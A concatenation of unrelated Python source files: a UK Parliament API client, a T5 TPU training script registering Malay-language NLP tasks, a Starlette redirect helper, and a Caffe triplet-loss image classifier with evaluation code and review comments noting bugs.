            member.display_name = data["memberRank"] + " " + data["memberTitle"]
        member.party = self.parl.parties.from_name(data["memberParty"])
        return member

    def current(self) -> MemberList:
        """ Fetch all current members of the house. """
        data = self.parl.get_members(house=self.house.name)
        members = MemberList()
        for mem in data.iter("Member"):
            obj = self.from_id(int(mem.get("Member_Id")))
            obj._populate_data(mem)
            members.append(obj)
        return members
class House(object):
    """One house of Parliament (Commons or Lords) and its members."""

    def __init__(self, name: str, parl):
        self.name = name
        self.parl = parl
        self.members = Members(self)

    def recent_divisions(
        self, limit: int = 50, page: int = 0, since: str = None, cachebust: bool = False
    ):
        """ Return the recent divisions for this house.
        The "cachebust" parameter will defeat the rather overzealous
        caching on this endpoint, so use it considerately.
        """
        query = {}
        if since:
            query["min-uin"] = since
        if cachebust:
            tomorrow = datetime.datetime.utcnow() + datetime.timedelta(hours=24)
            query["max-date"] = tomorrow.isoformat()
        payload = self.parl.get(
            "%sdivisions.json" % self.name.lower(), limit, page, query
        )
        divisions = []
        for entry in payload["items"]:
            if since is not None and entry["uin"] <= since:
                continue
            division = Division(self)
            division.title = entry["title"].strip()
            division.uin = entry["uin"]
            division.resource = entry["_about"]
            division.date = parse_data(entry["date"]).date()
            divisions.append(division)
        # Divisions are not correctly sorted within days, so re-sort them
        return sorted(divisions)
class Commons(House):
    """The House of Commons; adds Commons-only endpoints such as EDMs."""

    def __init__(self, parl):
        super().__init__("Commons", parl)

    def get_edms(self, limit=50, page=0):
        """Yield EDM objects from the paged edms.json feed."""
        payload = self.parl.get("edms.json", limit, page)
        for entry in payload["items"]:
            motion = EDM()
            motion.title = entry["title"]
            motion.session = entry["session"]
            motion.number = int(parse_data(entry["edmNumber"]))
            motion.date_tabled = parse_data(entry["dateTabled"]).date()
            motion.status = parse_data(entry["edmStatus"])
            if "sponsorPrinted" in entry:
                motion.sponsors = entry["sponsorPrinted"]
            motion.primary_sponsor = entry["primarySponsorPrinted"]
            motion.signatures = entry["numberOfSignatures"]
            yield motion
|
11521149
|
import tensorflow as tf
import tensorflow_datasets as tfds
from t5.data import preprocessors as prep
import functools
import t5
import gin
# SentencePiece model shared by every task registered below.
vocab = 'gs://mesolitica-tpu-general/t5-data-v2/sp10m.cased.ms-en.model'
# Resolve the TPU worker this job will run against.
tpu = tf.distribute.cluster_resolver.TPUClusterResolver(
    'node-7', zone='europe-west4-a', project='mesolitica-tpu'
)
TPU_ADDRESS = tpu.get_master()
TPU_TOPOLOGY = '2x2'
print(TPU_ADDRESS)
def dumping_dataset(split, shuffle_files=False):
    """Stream the unsupervised dumping corpora as {'title', 'text'} dicts."""
    del shuffle_files
    tsv_files = [
        'gs://mesolitica-tpu-general/t5-data-v2/dumping-news.txt.tsv',
        'gs://mesolitica-tpu-general/t5-data-v2/dumping-parliament.txt.tsv',
        'gs://mesolitica-tpu-general/t5-data-v2/filtered-dumping-academia.txt.tsv',
        'gs://mesolitica-tpu-general/t5-data-v2/filtered-dumping-wiki.txt.tsv',
    ]
    tsv_files += tf.io.gfile.glob(
        'gs://mesolitica-tpu-general/t5-data-v2/00.jsonl-*.translated.txt.tsv'
    )
    dataset = tf.data.TextLineDataset(tsv_files)
    split_columns = functools.partial(
        tf.io.decode_csv,
        record_defaults=['', ''],
        field_delim='\t',
        use_quote_delim=False,
    )
    dataset = dataset.map(
        split_columns, num_parallel_calls=tf.data.experimental.AUTOTUNE
    )
    return dataset.map(lambda *cols: dict(zip(['title', 'text'], cols)))


# Register the unsupervised span-corruption task over the dump corpora.
t5.data.TaskRegistry.remove('dumping_dataset')
t5.data.TaskRegistry.add(
    'dumping_dataset',
    dataset_fn=dumping_dataset,
    splits=['train'],
    text_preprocessor=functools.partial(
        t5.data.preprocessors.rekey,
        key_map={'inputs': None, 'targets': 'text'},
    ),
    token_preprocessor=t5.data.preprocessors.unsupervised,
    sentencepiece_model_path=vocab,
    metric_fns=[],
)
def question_dataset(split, shuffle_files=False):
    """Yield {'question', 'answer'} pairs from the QA tsv."""
    del shuffle_files
    dataset = tf.data.TextLineDataset(
        ['gs://mesolitica-tpu-general/t5-data-v2/qa.tsv']
    )
    dataset = dataset.map(
        functools.partial(
            tf.io.decode_csv,
            record_defaults=['', ''],
            field_delim='\t',
            use_quote_delim=False,
        ),
        num_parallel_calls=tf.data.experimental.AUTOTUNE,
    )
    return dataset.map(lambda *cols: dict(zip(['question', 'answer'], cols)))


def question_preprocessor(ds):
    """Prefix each question with the Malay task tag 'soalan: '."""
    def fmt(example):
        return {
            'inputs': tf.strings.join(['soalan: ', example['question']]),
            'targets': example['answer'],
        }
    return ds.map(fmt, num_parallel_calls=tf.data.experimental.AUTOTUNE)


t5.data.TaskRegistry.remove('question_dataset')
t5.data.TaskRegistry.add(
    'question_dataset',
    dataset_fn=question_dataset,
    splits=['train'],
    text_preprocessor=[question_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
def pair_dataset(split, shuffle_files=False):
    """Stream sentence-pair tsvs as {'text': ...} examples."""
    del shuffle_files
    dataset = tf.data.TextLineDataset(
        tf.io.gfile.glob('gs://mesolitica-tpu-general/t5-data-v2/*pair.tsv')
    )
    dataset = dataset.map(
        functools.partial(
            tf.io.decode_csv,
            record_defaults=['', ''],
            field_delim='\t',
            use_quote_delim=False,
        ),
        num_parallel_calls=tf.data.experimental.AUTOTUNE,
    )
    # Only the first column is kept: zip() stops at the shorter sequence.
    return dataset.map(lambda *cols: dict(zip(['text'], cols)))


t5.data.TaskRegistry.remove('pair_dataset')
t5.data.TaskRegistry.add(
    'pair_dataset',
    dataset_fn=pair_dataset,
    splits=['train'],
    text_preprocessor=[prep.next_sentence_prediction],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
def news_dataset(split, shuffle_files=False):
    """Yield {'question', 'answer'} pairs for headline generation."""
    del shuffle_files
    dataset = tf.data.TextLineDataset(
        ['gs://mesolitica-tpu-general/t5-data-v2/newstitle.tsv']
    )
    dataset = dataset.map(
        functools.partial(
            tf.io.decode_csv,
            record_defaults=['', ''],
            field_delim='\t',
            use_quote_delim=False,
        ),
        num_parallel_calls=tf.data.experimental.AUTOTUNE,
    )
    return dataset.map(lambda *cols: dict(zip(['question', 'answer'], cols)))


def news_preprocessor(ds):
    """Prefix each article with the Malay task tag 'tajuk: ' (headline)."""
    def fmt(example):
        return {
            'inputs': tf.strings.join(['tajuk: ', example['question']]),
            'targets': example['answer'],
        }
    return ds.map(fmt, num_parallel_calls=tf.data.experimental.AUTOTUNE)


t5.data.TaskRegistry.remove('news_dataset')
t5.data.TaskRegistry.add(
    'news_dataset',
    dataset_fn=news_dataset,
    splits=['train'],
    text_preprocessor=[news_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
def summarization_dataset(split, shuffle_files=False):
    """Yield {'question', 'answer'} pairs for summarization."""
    del shuffle_files
    dataset = tf.data.TextLineDataset(
        ['gs://mesolitica-tpu-general/t5-data-v2/summarization.tsv']
    )
    dataset = dataset.map(
        functools.partial(
            tf.io.decode_csv,
            record_defaults=['', ''],
            field_delim='\t',
            use_quote_delim=False,
        ),
        num_parallel_calls=tf.data.experimental.AUTOTUNE,
    )
    return dataset.map(lambda *cols: dict(zip(['question', 'answer'], cols)))


def summarization_preprocessor(ds):
    """Prefix each document with the Malay task tag 'ringkasan: ' (summary)."""
    def fmt(example):
        return {
            'inputs': tf.strings.join(['ringkasan: ', example['question']]),
            'targets': example['answer'],
        }
    return ds.map(fmt, num_parallel_calls=tf.data.experimental.AUTOTUNE)


t5.data.TaskRegistry.remove('summarization_dataset')
t5.data.TaskRegistry.add(
    'summarization_dataset',
    dataset_fn=summarization_dataset,
    splits=['train'],
    text_preprocessor=[summarization_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
def similarity_dataset(split, shuffle_files=False):
    """Yield {'question', 'answer'} pairs from the SNLI/MNLI tsvs."""
    del shuffle_files
    dataset = tf.data.TextLineDataset(
        [
            'gs://mesolitica-tpu-general/t5-data-v2/snli.tsv',
            'gs://mesolitica-tpu-general/t5-data-v2/mnli.tsv',
        ]
    )
    dataset = dataset.map(
        functools.partial(
            tf.io.decode_csv,
            record_defaults=['', ''],
            field_delim='\t',
            use_quote_delim=False,
        ),
        num_parallel_calls=tf.data.experimental.AUTOTUNE,
    )
    return dataset.map(lambda *cols: dict(zip(['question', 'answer'], cols)))


def similarity_preprocessor(ds):
    """Rename columns to inputs/targets; the tsv already carries the prompt."""
    def fmt(example):
        return {
            'inputs': example['question'],
            'targets': example['answer'],
        }
    return ds.map(fmt, num_parallel_calls=tf.data.experimental.AUTOTUNE)


t5.data.TaskRegistry.remove('similarity_dataset')
t5.data.TaskRegistry.add(
    'similarity_dataset',
    dataset_fn=similarity_dataset,
    splits=['train'],
    text_preprocessor=[similarity_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
def en_ms_dataset(split, shuffle_files=False):
    """Yield {'question', 'answer'} pairs for English→Malay translation."""
    del shuffle_files
    dataset = tf.data.TextLineDataset(
        ['gs://mesolitica-tpu-general/t5-data-v2/en-ms.tsv']
    )
    dataset = dataset.map(
        functools.partial(
            tf.io.decode_csv,
            record_defaults=['', ''],
            field_delim='\t',
            use_quote_delim=False,
        ),
        num_parallel_calls=tf.data.experimental.AUTOTUNE,
    )
    return dataset.map(lambda *cols: dict(zip(['question', 'answer'], cols)))


def en_ms_preprocessor(ds):
    """Prefix each source sentence with the English→Malay task tag."""
    def fmt(example):
        return {
            'inputs': tf.strings.join(['terjemah Inggeris ke Melayu: ', example['question']]),
            'targets': example['answer'],
        }
    return ds.map(fmt, num_parallel_calls=tf.data.experimental.AUTOTUNE)


t5.data.TaskRegistry.remove('en_ms_dataset')
t5.data.TaskRegistry.add(
    'en_ms_dataset',
    dataset_fn=en_ms_dataset,
    splits=['train'],
    text_preprocessor=[en_ms_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
def ms_en_dataset(split, shuffle_files=False):
    """Yield {'question', 'answer'} dicts from the Malay->English TSV dump."""
    del shuffle_files  # single 'train' split; the flag is irrelevant here
    dataset = tf.data.TextLineDataset(
        ['gs://mesolitica-tpu-general/t5-data-v2/ms-en.tsv']
    )
    decode = functools.partial(
        tf.io.decode_csv,
        record_defaults=['', ''],
        field_delim='\t',
        use_quote_delim=False,
    )
    dataset = dataset.map(decode, num_parallel_calls=tf.data.experimental.AUTOTUNE)
    return dataset.map(lambda *fields: dict(zip(['question', 'answer'], fields)))
def ms_en_preprocessor(ds):
    """Prepend the MS->EN translation prompt to every example."""
    def _to_io(example):
        return {
            'inputs': tf.strings.join(
                ['terjemah Melayu ke Inggeris: ', example['question']]),
            'targets': example['answer'],
        }
    return ds.map(_to_io, num_parallel_calls=tf.data.experimental.AUTOTUNE)
# (Re)register the MS->EN translation task idempotently.
t5.data.TaskRegistry.remove('ms_en_dataset')
t5.data.TaskRegistry.add(
    'ms_en_dataset',
    dataset_fn=ms_en_dataset,
    splits=['train'],
    text_preprocessor=[ms_en_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
def knowledge_graph_dataset(split, shuffle_files=False):
    """Yield {'question', 'answer'} dicts from the knowledge-graph TSV dump."""
    del shuffle_files  # single 'train' split; the flag is irrelevant here
    dataset = tf.data.TextLineDataset(
        ['gs://mesolitica-tpu-general/t5-data-v2/knowledge-graph.tsv']
    )
    decode = functools.partial(
        tf.io.decode_csv,
        record_defaults=['', ''],
        field_delim='\t',
        use_quote_delim=False,
    )
    dataset = dataset.map(decode, num_parallel_calls=tf.data.experimental.AUTOTUNE)
    return dataset.map(lambda *fields: dict(zip(['question', 'answer'], fields)))
def knowledge_graph_preprocessor(ds):
    """Prepend the knowledge-graph prompt to every example."""
    def _to_io(example):
        return {
            'inputs': tf.strings.join(['grafik pengetahuan: ', example['question']]),
            'targets': example['answer'],
        }
    return ds.map(_to_io, num_parallel_calls=tf.data.experimental.AUTOTUNE)
# (Re)register the knowledge-graph task idempotently.
t5.data.TaskRegistry.remove('knowledge_graph_dataset')
t5.data.TaskRegistry.add(
    'knowledge_graph_dataset',
    dataset_fn=knowledge_graph_dataset,
    splits=['train'],
    text_preprocessor=[knowledge_graph_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
def paraphrase_dataset(split, shuffle_files=False):
    """Yield {'question', 'answer'} dicts from the paraphrase TSV dump."""
    del shuffle_files  # single 'train' split; the flag is irrelevant here
    dataset = tf.data.TextLineDataset(
        ['gs://mesolitica-tpu-general/t5-data-v2/paraphrase.tsv']
    )
    decode = functools.partial(
        tf.io.decode_csv,
        record_defaults=['', ''],
        field_delim='\t',
        use_quote_delim=False,
    )
    dataset = dataset.map(decode, num_parallel_calls=tf.data.experimental.AUTOTUNE)
    return dataset.map(lambda *fields: dict(zip(['question', 'answer'], fields)))
def paraphrase_preprocessor(ds):
    """Prepend the paraphrase prompt to every example."""
    def _to_io(example):
        return {
            'inputs': tf.strings.join(['parafrasa: ', example['question']]),
            'targets': example['answer'],
        }
    return ds.map(_to_io, num_parallel_calls=tf.data.experimental.AUTOTUNE)
# (Re)register the paraphrase task idempotently.
t5.data.TaskRegistry.remove('paraphrase_dataset')
t5.data.TaskRegistry.add(
    'paraphrase_dataset',
    dataset_fn=paraphrase_dataset,
    splits=['train'],
    text_preprocessor=[paraphrase_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
# Combine all registered tasks into one equally-weighted training mixture.
t5.data.MixtureRegistry.remove('trivia_all_bahasa')
t5.data.MixtureRegistry.add(
    'trivia_all_bahasa',
    [
        'dumping_dataset',
        'question_dataset',
        'pair_dataset',
        'news_dataset',
        'summarization_dataset',
        'similarity_dataset',
        'en_ms_dataset',
        'ms_en_dataset',
        'knowledge_graph_dataset',
        'paraphrase_dataset'
    ],
    default_rate=1.0,
)
# NOTE(review): this is an exact duplicate of the ms_en_dataset definition
# above; it silently rebinds the name to an identical function. Consider
# deleting this redefinition (and the duplicated preprocessor/registration
# that follow) — confirm no later edit intended them to diverge.
def ms_en_dataset(split, shuffle_files=False):
    # `split` is unused; only a single 'train' split exists for this task.
    del shuffle_files
    ds = tf.data.TextLineDataset(
        [
            'gs://mesolitica-tpu-general/t5-data-v2/ms-en.tsv'
        ]
    )
    # Split each tab-separated line into two string columns.
    ds = ds.map(
        functools.partial(
            tf.io.decode_csv,
            record_defaults=['', ''],
            field_delim='\t',
            use_quote_delim=False,
        ),
        num_parallel_calls=tf.data.experimental.AUTOTUNE,
    )
    ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
    return ds
# NOTE(review): duplicate of the ms_en_preprocessor defined earlier in this
# file — identical body; candidate for removal.
def ms_en_preprocessor(ds):
    def to_inputs_and_targets(ex):
        return {
            'inputs': tf.strings.join(['terjemah Melayu ke Inggeris: ', ex['question']]),
            'targets': ex['answer'],
        }
    return ds.map(
        to_inputs_and_targets,
        num_parallel_calls=tf.data.experimental.AUTOTUNE,
    )
# NOTE(review): re-registration with identical arguments to the earlier
# 'ms_en_dataset' registration; redundant but harmless.
t5.data.TaskRegistry.remove('ms_en_dataset')
t5.data.TaskRegistry.add(
    'ms_en_dataset',
    dataset_fn=ms_en_dataset,
    splits=['train'],
    text_preprocessor=[ms_en_preprocessor],
    sentencepiece_model_path=vocab,
    postprocess_fn=t5.data.postprocessors.lower_text,
    metric_fns=[t5.evaluation.metrics.accuracy],
)
# NOTE(review): this REPLACES the 'trivia_all_bahasa' mixture registered
# above and silently drops 'knowledge_graph_dataset' and
# 'paraphrase_dataset' from training — confirm which task list is intended.
t5.data.MixtureRegistry.remove('trivia_all_bahasa')
t5.data.MixtureRegistry.add(
    'trivia_all_bahasa',
    [
        'dumping_dataset',
        'question_dataset',
        'pair_dataset',
        'news_dataset',
        'summarization_dataset',
        'similarity_dataset',
        'en_ms_dataset',
        'ms_en_dataset',
    ],
    default_rate=1.0,
)
def main(_):
    """Train the T5 'base' model on the trivia_all_bahasa mixture on TPU.

    Reads the pretrained operative gin config, picks per-size TPU settings
    from a lookup table, and runs training for 1M steps.
    """
    tf.logging.set_verbosity(tf.logging.DEBUG)
    gin.parse_config_file(
        'gs://mesolitica-tpu-general/t5-data/pretrained_models_middle_operative_config.gin'
    )
    MODEL_SIZE = 'base'
    # Per-size settings: (model_parallelism, batch_size, keep_checkpoint_max).
    model_parallelism, train_batch_size, keep_checkpoint_max = {
        'small': (1, 256, 16),
        'base': (2, 128, 8),
        'large': (8, 64, 4),
        '3B': (8, 16, 1),
        '11B': (8, 16, 1),
    }[MODEL_SIZE]
    model = t5.models.MtfModel(
        model_dir='gs://mesolitica-tpu-general/t5-middle-v2/',
        tpu=TPU_ADDRESS,
        tpu_topology=TPU_TOPOLOGY,
        model_parallelism=model_parallelism,
        batch_size=train_batch_size,
        sequence_length={'inputs': 1024, 'targets': 1024},
        learning_rate_schedule=0.001,
        save_checkpoints_steps=5000,
        # BUG FIX: was hard-coded to 5, ignoring the value unpacked from the
        # size table above ('base' -> 8).
        keep_checkpoint_max=keep_checkpoint_max,
        iterations_per_loop=100,
    )
    model.train(mixture_or_task_name='trivia_all_bahasa', steps=1000000)
# Script entry point: tf.app.run parses flags and invokes main().
if __name__ == '__main__':
    tf.app.run()
|
11521208
|
from starlette.requests import Request
from starlette.responses import RedirectResponse
from starlette.status import HTTP_303_SEE_OTHER
def redirect(request: Request, view: str, **params):
    """Return a 303 redirect to the named admin view.

    The target URL is the app's admin path prefix plus the reversed route
    for ``view`` with ``params`` substituted.
    """
    target = request.app.admin_path + request.app.url_path_for(view, **params)
    return RedirectResponse(url=target, status_code=HTTP_303_SEE_OTHER)
|
11521224
|
import numpy as np
import os
import cv2
import cv2.cv as cv
from skimage import transform as tf
from PIL import Image, ImageDraw
import threading
from time import ctime,sleep
import time
import sklearn
import matplotlib.pyplot as plt
import skimage
import sklearn.metrics.pairwise as pw
import triplet._init_paths
import triplet.config as cfg
from triplet.sampledata import sampledata
from utils.timer import Timer
import caffe
from caffe.proto import caffe_pb2
import google.protobuf as pb2
import argparse
import glob
from sklearn.metrics import confusion_matrix
import pandas as pd
####
####Define Recognizer
####
# Module-level configuration for the recognizer scripts below.
# NOTE(review): `global` at module scope is a no-op in Python — these
# declarations are harmless but redundant and could be removed.
global filelist_path
filelist_path='./filelist/'          # directory holding per-class image lists
global extension
extension='.txt'                     # list-file extension
global filenames
filenames = ['c0','c1','c2','c3','c4','c5','c6','c7','c8','c9']  # class list files
global filecount
filecount = [2489,2267,2317,2346,2326,2312,2325,2002,1911,2129]  # images per class
global feature_size
feature_size=1024                    # length of the 'deepid' embedding
global class_size
class_size=10                        # number of classes
global model_name
model_name = 'triplet-loss'#'batch-triplet-loss'#'softmax'#
global accuracy_path
accuracy_path = './accuracy/'        # where accuracy logs are written
def plot_confusion_matrix(df_confusion, title='Confusion matrix', cmap=plt.cm.gray_r):
    """Render a pandas crosstab as a matrix image with labelled axes."""
    plt.matshow(df_confusion, cmap=cmap)  # imshow-style rendering
    plt.colorbar()
    ticks = np.arange(len(df_confusion.columns))
    plt.xticks(ticks, df_confusion.columns, rotation=45)
    plt.yticks(ticks, df_confusion.index)
    plt.ylabel(df_confusion.index.name)
    plt.xlabel(df_confusion.columns.name)
class Recognizer(caffe.Net):
    """
    Recognizer extends Net for image class prediction
    by scaling, center cropping, or oversampling.
    Parameters
    ----------
    image_dims : dimensions to scale input for cropping/sampling.
    Default is to scale to net input size for whole-image crop.
    mean, input_scale, raw_scale, channel_swap: params for
    preprocessing options.
    """
    def __init__(self, model_file, pretrained_file, mean_file=None,
                 image_dims=(227, 227),
                 raw_scale=255,
                 channel_swap=(2,1,0),
                 input_scale=None):
        #set GPU mode
        caffe.set_mode_gpu()
        #init net
        caffe.Net.__init__(self, model_file, pretrained_file, caffe.TEST)
        # configure pre-processing
        in_ = self.inputs[0]
        self.transformer = caffe.io.Transformer(
            {in_: self.blobs[in_].data.shape})
        self.transformer.set_transpose(in_, (2, 0, 1))
        if mean_file is not None:
            # NOTE(review): file handle is never closed; a `with` block
            # would be safer.
            proto_data = open(mean_file, "rb").read()
            mean_blob = caffe.io.caffe_pb2.BlobProto.FromString(proto_data)
            mean = caffe.io.blobproto_to_array(mean_blob)[0]
            self.transformer.set_mean(in_, mean)
        if input_scale is not None:
            self.transformer.set_input_scale(in_, input_scale)
        if raw_scale is not None:
            self.transformer.set_raw_scale(in_, raw_scale)
        if channel_swap is not None:
            self.transformer.set_channel_swap(in_, channel_swap)
        # Spatial dims (H, W) the net actually consumes.
        self.crop_dims = np.array(self.blobs[in_].data.shape[2:])
        if not image_dims:
            image_dims = self.crop_dims
        self.image_dims = image_dims
    def alex_predict(self, oversample=True):
        """
        Predict classification probabilities of inputs.
        Parameters
        ----------
        inputs : iterable of (H x W x K) input ndarrays.
        oversample : boolean
            average predictions across center, corners, and mirrors
            when True (default). Center-only prediction when False.
        Returns
        -------
        predictions: (N x C) ndarray of class probabilities for N images and C
            classes.
        """
        #load files
        # NOTE(review): input directory is hard-coded to class c9 — probably
        # a leftover from debugging; consider making it a parameter.
        input_dir='/media/frank/Data/Database/ImageNet/Kaggle/train/c9'
        inputs =[caffe.io.load_image(im_f)
                 for im_f in glob.glob(input_dir + '/*.jpg')]
        # Scale to standardize input dimensions.
        input_ = np.zeros((len(inputs),
                           self.image_dims[0],
                           self.image_dims[1],
                           inputs[0].shape[2]),
                          dtype=np.float32)
        for ix, in_ in enumerate(inputs):
            input_[ix] = caffe.io.resize_image(in_, self.image_dims)
        if oversample:
            # Generate center, corner, and mirrored crops.
            input_ = caffe.io.oversample(input_, self.crop_dims)
        else:
            # Take center crop.
            center = np.array(self.image_dims) / 2.0
            crop = np.tile(center, (1, 2))[0] + np.concatenate([
                -self.crop_dims / 2.0,
                self.crop_dims / 2.0
            ])
            crop = crop.astype(int)
            input_ = input_[:, crop[0]:crop[2], crop[1]:crop[3], :]
        # Classify
        caffe_in = np.zeros(np.array(input_.shape)[[0, 3, 1, 2]],
                            dtype=np.float32)
        for ix, in_ in enumerate(input_):
            caffe_in[ix] = self.transformer.preprocess(self.inputs[0], in_)
        out = self.forward_all(**{self.inputs[0]: caffe_in})
        predictions = out[self.outputs[0]]
        # For oversampling, average predictions across crops.
        if oversample:
            # Python-2 integer division is intentional here (10 crops/image).
            predictions = predictions.reshape((len(predictions) / 10, 10, -1))
            predictions = predictions.mean(1)
        return predictions
    def read_imagelist(self,filelist):
        # Read newline-separated image paths and return a (N, 3, H, W) BGR-ish
        # array (channel order matches the net's expected swap below).
        fid=open(filelist)
        lines=fid.readlines()
        test_num=len(lines)
        fid.close()
        X=np.empty((test_num,3,self.image_dims[0],self.image_dims[1]))
        i =0
        for line in lines:
            word=line.split('\n')
            filename=word[0]
            im1=skimage.io.imread(filename,as_grey=False)
            image =skimage.transform.resize(im1,(self.image_dims[0], self.image_dims[1]))*255
            if image.ndim<3:
                # Grayscale image: replicate the single channel.
                print 'gray:'+filename
                X[i,0,:,:]=image[:,:]
                X[i,1,:,:]=image[:,:]
                X[i,2,:,:]=image[:,:]
            else:
                X[i,0,:,:]=image[:,:,2]
                X[i,1,:,:]=image[:,:,0]
                X[i,2,:,:]=image[:,:,1]
            i=i+1
        return X
    # NOTE(review): read_labels and draw_roc_curve are defined inside the
    # class but take no `self`; calling them on an instance will fail.
    # They look like they were meant to be module-level helpers.
    def read_labels(labelfile):
        # Parse one integer label per line into a float ndarray.
        fin=open(labelfile)
        lines=fin.readlines()
        labels=np.empty((len(lines),))
        k=0;
        for line in lines:
            labels[k]=int(line)
            k=k+1;
        fin.close()
        return labels
    def draw_roc_curve(fpr,tpr,title='cosine',save_name='roc_lfw'):
        # Plot and save an ROC curve for the given FPR/TPR arrays.
        plt.figure()
        plt.plot(fpr, tpr)
        plt.plot([0, 1], [0, 1], 'k--')
        plt.xlim([0.0, 1.0])
        plt.ylim([0.0, 1.0])
        plt.xlabel('False Positive Rate')
        plt.ylabel('True Positive Rate')
        plt.title('Receiver operating characteristic using: '+title)
        plt.legend(loc="lower right")
        plt.show()
        plt.savefig(save_name+'.png')
    #predict_test_alexnet
    def test_alex(self):
        # Run the net's softmax output directly over every class list and
        # report top-1 accuracy (argmax == true class index).
        class_index = 0
        image_index = 0
        total_count = 0.0
        accept_sum = 0
        actual = []
        predict = []
        for filename in filenames:
            #query-feature
            X=self.read_imagelist(filelist_path + filename + extension)
            test_num=np.shape(X)[0]
            out = self.forward_all(data=X)
            predicts=out[self.outputs[0]]
            predicts=np.reshape(predicts,(test_num,10))
            confusion_array = np.zeros((class_size), dtype = np.int)
            for i in range(test_num):
                actual.append(class_index)
                for j in range(class_size):
                    if np.max(predicts[i]) == predicts[i][j]:
                        confusion_array[j] += 1
                        predict.append(j)
                image_index += 1
            #print(confusion_array)
            total_count += test_num
            accept_sum += confusion_array[class_index]
            class_index += 1
        print 'total:%d' % (round(total_count))
        print 'accept:%d' % (accept_sum)
        print 'reject:%d' % (round(total_count) - accept_sum)
        print 'accuray:%.4f' % (accept_sum / total_count)
        #conf_mat = confusion_matrix(actual,predict)
        #print(conf_mat)
        #actual = np.array(actual)
        #predict = np.array(predict)
        #y_actual = pd.Series(actual, name='Actual')
        #y_predict = pd.Series(predict, name='Predicted')
        #df_confusion = pd.crosstab(y_actual,y_predict, rownames=['Actual'], colnames=['Predicted'], margins=True)
        #print(df_confusion)
        #plot_confusion_matrix(df_confusion)
        return (accept_sum / total_count)
    #process a text file
    def evaluate(self,metric='cosine'):
        # NOTE(review): this method is broken as written —
        #  * `filelist_sample` is not defined anywhere in this module
        #    (NameError on first call);
        #  * `confusion_array` is used below without being initialized
        #    (compare test_alex/evaluate3, which zero it per class).
        # Left untouched pending confirmation of intended behavior.
        #sample-feature
        X=self.read_imagelist(filelist_sample)
        sample_num=np.shape(X)[0]
        out = self.forward_all(data=X)
        feature1=np.float64(out['deepid'])
        feature1=np.reshape(feature1,(sample_num,feature_size))
        #np.savetxt('feature1.txt', feature1, delimiter=',')
        class_index = 0
        image_index = 0
        total_count = 0.0
        accept_sum = 0
        actual = []
        predict = []
        for filename in filenames:
            #query-feature
            X=self.read_imagelist(filelist_path + filename + extension)
            test_num=np.shape(X)[0]
            out = self.forward_all(data=X)
            feature2=np.float64(out['deepid'])
            feature2=np.reshape(feature2,(test_num,feature_size))
            #np.savetxt('feature2.txt', feature2, delimiter=',')
            #mt=pw.pairwise_distances(feature2, feature1, metric=metric)
            mt=pw.cosine_similarity(feature2, feature1)
            false=0
            for i in range(test_num):
                actual.append(class_index)
                for j in range(sample_num):
                    if np.max(mt[i]) == mt[i][j]:
                        confusion_array[j] += 1
                        predict.append(j)
                image_index += 1
            total_count += test_num
            accept_sum += confusion_array[class_index]
            class_index += 1
        print 'total:%d' % (round(total_count))
        print 'accept:%d' % (accept_sum)
        print 'reject:%d' % (round(total_count) - accept_sum)
        print 'accuray:%.4f' % (accept_sum / total_count)
        #conf_mat = confusion_matrix(actual,predict)
        #print(conf_mat)
        actual = np.array(actual)
        predict = np.array(predict)
        y_actual = pd.Series(actual, name='Actual')
        y_predict = pd.Series(predict, name='Predicted')
        df_confusion = pd.crosstab(y_actual,y_predict, rownames=['Actual'], colnames=['Predicted'], margins=True)
        print(df_confusion)
        plot_confusion_matrix(df_confusion)
        return (accept_sum / total_count)
    #process a text file
    def evaluate2(self,metric='cosine'):
        # Nearest-mean classification: compare each query embedding against
        # per-class mean features previously written by saveFeature().
        # NOTE(review): `confusion_array` is used below without being
        # initialized — NameError on first call (evaluate3 zeroes it per
        # class; the same line is missing here).
        feature1=np.fromfile('./features/' + model_name +'-features.dat',dtype=np.float64)
        feature1=np.reshape(feature1,(class_size,feature_size))
        #np.savetxt('feature1.txt', feature1, delimiter=',')
        class_index = 0
        image_index = 0
        total_count = 0.0
        accept_sum = 0
        actual = []
        predict = []
        for filename in filenames:
            #query-feature
            X=self.read_imagelist(filelist_path + filename + extension)
            test_num=np.shape(X)[0]
            out = self.forward_all(data=X)
            feature2=np.float64(out['deepid'])
            feature2=np.reshape(feature2,(test_num,feature_size))
            #np.savetxt('feature2.txt', feature2, delimiter=',')
            #mt=pw.pairwise_distances(feature2, feature1, metric=metric)
            mt=pw.cosine_similarity(feature2, feature1)
            false=0
            for i in range(test_num):
                actual.append(class_index)
                for j in range(class_size):
                    if np.max(mt[i]) == mt[i][j]:
                        confusion_array[j] += 1
                        predict.append(j)
                image_index += 1
            total_count += test_num
            accept_sum += confusion_array[class_index]
            class_index += 1
        print 'total:%d' % (round(total_count))
        print 'accept:%d' % (accept_sum)
        print 'reject:%d' % (round(total_count) - accept_sum)
        print 'accuray:%.4f' % (accept_sum / total_count)
        #conf_mat = confusion_matrix(actual,predict)
        #print(conf_mat)
        #actual = np.array(actual)
        #predict = np.array(predict)
        #y_actual = pd.Series(actual, name='Actual')
        #y_predict = pd.Series(predict, name='Predicted')
        #df_confusion = pd.crosstab(y_actual,y_predict, rownames=['Actual'], colnames=['Predicted'], margins=True)
